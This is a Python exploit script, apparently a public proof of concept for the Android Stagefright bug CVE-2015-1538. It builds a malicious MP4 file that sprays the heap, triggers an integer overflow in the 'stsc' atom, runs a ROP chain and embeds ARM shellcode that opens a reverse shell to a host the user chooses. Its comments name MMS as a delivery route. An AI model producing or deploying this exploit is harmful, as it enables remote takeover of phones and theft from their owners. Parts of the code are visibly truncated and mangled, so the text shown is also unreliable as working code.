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#!/usr/bin/env python

Joshua J. Drake (@jduck) of ZIMPERIUM zLabs

Shout outs to our friends at Optiv (formerly Accuvant Labs)

(C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015

Exploit for RCE Vulnerability CVE-2015-1538 #1

Integer Overflow in the libstagefright MP4 'stsc' atom handling

Don't forget, the output of "create_mp4" can be delivered many ways!

MMS is the most dangerous attack vector, but not the only one...

DISCLAIMER: This exploit is for testing and educational purposes only. Any

other usage for this code is not allowed. Use at your own risk.

"With great power comes great responsibility." - Uncle Ben

import struct import socket

Creates a single MP4 atom - LEN, TAG, DATA

def make_chunk(tag, data): if len(tag) != 4: raise 'Yo! They call it "FourCC" for a reason.' ret = struct.pack('>L', len(data) + 8) ret += tag ret += data return ret

Make an 'stco' atom - Sample Table Chunk Offets

def make_stco(extra=''): ret = struct.pack('>L', 0) # version ret += struct.pack('>L', 0) # mNumChunkOffsets return make_chunk('stco', ret+extra)

Make an 'stsz' atom - Sample Table Size

def make_stsz(extra=''): ret = struct.pack('>L', 0) # version ret += struct.pack('>L', 0) # mDefaultSampleSize ret += struct.pack('>L', 0) # mNumSampleSizes return make_chunk('stsz', ret+extra)

Make an 'stts' atom - Sample Table Time-to-Sample

def make_stts(): ret = struct.pack('>L', 0) # version ret += struct.pack('>L', 0) # mTimeToSampleCount return make_chunk('stts', ret)

This creates a single Sample Table Sample-to-Chunk entry

def make_stsc_entry(start, per, desc): ret = '' ret += struct.pack('>L', start + 1) ret += struct.pack('>L', per) ret += struct.pack('>L', desc) return ret

Make an 'stsc' chunk - Sample Table Sample-to-Chunk

If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and

cause a heap overflow.

def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False): ret = struct.pack('>L', 0) # version/flags

# this is the clean version...
if not do_overflow:
    ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
    ret += 'Z' * (12 * num_alloc)
    return make_chunk('stsc', ret)

# now the explicit version. (trigger the bug)
ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets

# fill in the entries that will overflow the buffer
for x in range(0, num_write):
    ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)

ret = make_chunk('stsc', ret)

# patch the data_size
ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]

return ret

Build the ROP chain

ROP pivot by Georg Wicherski! Thanks!

""" (gdb) x/10i __dl_restore_core_regs 0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34 0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5} 0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5} 0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11} 0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc} """

""" b0001144 <__dl_mprotect>: b0001144: e92d0090 push {r4, r7} b0001148: e3a0707d mov r7, #125 ; 0x7d b000114c: ef000000 svc 0x00000000 b0001150: e8bd0090 pop {r4, r7} b0001154: e1b00000 movs r0, r0 b0001158: 512fff1e bxpl lr b000115c: ea0015cc b b0006894 <__dl_raise+0x10> """

def build_rop(off, sp_addr, newpc_val, cb_host, cb_port): rop = '' rop += struct.pack('<L', sp_addr + off + 0x10) # new sp rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc} rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}

rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
rop += struct.pack('<L', 0x1000)               # new r1 - length
rop += struct.pack('<L', 7)                    # new r2 - protection
rop += struct.pack('<L', 0xd000d003)           # new r3 - scratch
rop += struct.pack('<L', 0xd000d004)           # new r4 - scratch
rop += struct.pack('<L', 0xb0001144)           # new pc - _dl_mprotect

native_start = sp_addr + 0x80
rop += struct.pack('<L', native_start)         # address of native payload
#rop += struct.pack('<L', 0xfeedfed5)          # top of stack...
# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
buf =  ''
# fork
buf += '\x02\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# continue if not parent...
buf += '\x00\x00\x50\xe3'
buf += '\x02\x00\x00\x0a'
# exit parent
buf += '\x00\x00\xa0\xe3'
buf += '\x01\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# setsid in child
buf += '\x42\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# socket/connect/dup2/dup2/dup2
buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += '\xe3\x00\x00\x00\xef'
# execve(shell, argv, env)
buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += '\xef\x02\x00'
# Add the connect back host/port
buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)
# shell -
buf += '/system/bin/sh\x00\x00'
# argv -
buf += 'sh\x00\x00'
# env -
buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'

# Add some identifiable stuff, just in case something goes awry...
rop_start_off = 0x34
x = rop_start_off + len(rop)
while len(rop) < 0x80 - rop_start_off:
    rop += struct.pack('<L', 0xf0f00000+x)
    x += 4

# Add the native payload...
rop += buf

return rop

Build an mp4 that exploits CVE-2015-1538 #1

We mimic meow.3gp here...

def create_mp4(sp_addr, newpc_val, cb_host, cb_port): chunks = []

# Build the MP4 header...
ftyp =  'mp42'
ftyp += struct.pack('>L', 0)
ftyp += 'mp42'
ftyp += 'isom'
chunks.append(make_chunk('ftyp', ftyp))

# Note, this causes a few allocations...
moov_data = ''
moov_data += make_chunk('mvhd',
    struct.pack('>LL', 0, 0x41414141) +
    ('B' * 0x5c) )

# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk('trak',
        make_stsc(0x28, 0x28) +
        make_stco() +
        make_stsz() +
        make_stts() ))

# Spray the heap using a large tx3g chunk (can contain binary data!)
   0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>:   ldr r4, [r0, #4]  ; load mRefs
   0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>:   mov r5, r0
   0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>:   mov r6, r1
   0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>:   mov r0, r4
   0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>:  blx 0x40069884    ; atomic_decrement
   0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>:  cmp r0, #1        ; must be 1
   0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>:  bne.n   0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
   0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>:  ldr r0, [r4, #8]  ; load refs->mBase
   0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>:  ldr r1, [r0, #0]  ; load mBase._vptr
   0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>:  ldr r2, [r1, #12] ; load method address
   0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>:  mov r1, r6
   0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>:  blx r2            ; call it!
page = ''
off = 0  # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28)    # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1)             # mStrong
page += struct.pack('<L', 0xc0dedbad)    # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16)            # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe)    # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00)  # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04)  # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08)  # vtable entry 8
page += struct.pack('<L', newpc_val)          # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
    page += struct.pack('<L', 0xf0f00000+x)
    x += 4

off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
        struct.pack('>L', 0) +
            make_chunk('cpil',    make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
            make_chunk('trkn',    make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
            make_chunk('disk',    make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
            make_chunk('covr',    make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
            make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
            make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
            make_chunk('aART',    make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
            make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
            make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
            make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
            make_chunk('gnre',    make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
            make_chunk('covr',    make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
            make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
            make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
            make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
moov_data += udta

# Make the nasty trak
tkhd1 = ''.join([
    '\x00',       # version
    'D' * 3,      # padding
    'E' * (5*4),  # {c,m}time, id, ??, duration
    'F' * 0x10,   # ??
        0x10000,  # a00
        0,        # a01
        0,        # dx
        0,        # a10
        0x10000,  # a11
        0),       # dy
    'G' * 0x14

trak1 = ''
trak1 += make_chunk('tkhd', tkhd1)

mdhd1 = ''.join([
    '\x00',       # version
    'D' * 0x17,   # padding

mdia1 = ''
mdia1 += make_chunk('mdhd', mdhd1)
mdia1 += make_chunk('hdlr', 'F' * 0x3a)

dinf1 = ''
dinf1 += make_chunk('dref', 'H' * 0x14)

minf1 = ''
minf1 += make_chunk('smhd', 'G' * 0x08)
minf1 += make_chunk('dinf', dinf1)

# Build the nasty sample table to trigger the vulnerability here.
stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER

# Add the stbl to the minf chunk
minf1 += make_chunk('stbl', stbl1)

# Add the minf to the mdia chunk
mdia1 += make_chunk('minf', minf1)

# Add the mdia to the track
trak1 += make_chunk('mdia', mdia1)

# Add the nasty track to the moov data
moov_data += make_chunk('trak', trak1)

# Finalize the moov chunk
moov = make_chunk('moov', moov_data)

# Combine outer chunks together and voila.
data = ''.join(chunks)

return data

if name == 'main': import sys import mp4 import argparse

def write_file(path, content):
    with open(path, 'wb') as f:

def addr(sval):
    if sval.startswith('0x'):
        return int(sval, 16)
    return int(sval)

# The address of a fake StrongPointer object (sprayed)
sp_addr   = 0x41d00010  # takju @ imm76i - 2MB (via hangouts)

# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs

# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--connectback-host', dest='cbhost', default='')
parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
args = parser.parse_args()

if len(sys.argv) == 1:

if args.spray_addr == None:
    args.spray_addr = sp_addr
if args.rop_pivot == None:
    args.rop_pivot = newpc_val

# Build the MP4 file...
data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print('[*] Saving crafted MP4 to %s ...' % args.output_file)
write_file(args.output_file, data)


Vuln 2015_1538






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